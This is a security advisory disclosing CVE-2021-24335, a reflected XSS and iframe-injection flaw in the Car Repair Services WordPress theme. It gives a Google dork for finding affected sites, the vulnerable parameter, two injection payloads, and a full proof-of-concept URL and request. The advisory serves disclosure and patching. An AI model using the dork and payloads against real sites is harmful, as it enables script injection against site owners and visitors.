/*!
- # VULNERABILITY: Car Repair Services WordPress Theme v3.9 - Unauthenticated Reflected XSS & XFS
- # GOOGLE DORK: inurl:/wp-content/themes/car-repair-services/
- # DATE: 2021-02-12
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: SmartDataSoft [ https://smartdatasoft.com ]
- # SOFTWARE VERSION: <= 3.9
- # SOFTWARE LINK: https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
- # CVSS: AV:N/AC:L/PR:N/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24335
*/



### -- [ Info: ]

[i] An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Car Repair Services theme through v3.9 for WordPress.

[i] Vulnerable parameter(s): &serviceestimatekey=.

[i] Plugin(s) affected: Auto Repair Search by SmartDataSoft [ https://smartdatasoft.com ].



### -- [ Impact: ]

[~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] <img src=x onerror=alert(`m0ze`);>

[$] <iframe src=https://m0ze.ru/payload/xfsii.html>



### -- [ PoC | Unauthenticated Reflected XSS & XFS | Search query: ]

[!] https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg+src%3Dx+onerror%3Dalert%28%60m0ze%60%29%3B%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E

[!] GET /car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg+src%3Dx+onerror%3Dalert%28%60m0ze%60%29%3B%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: smartdata.tonytemplates.com



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze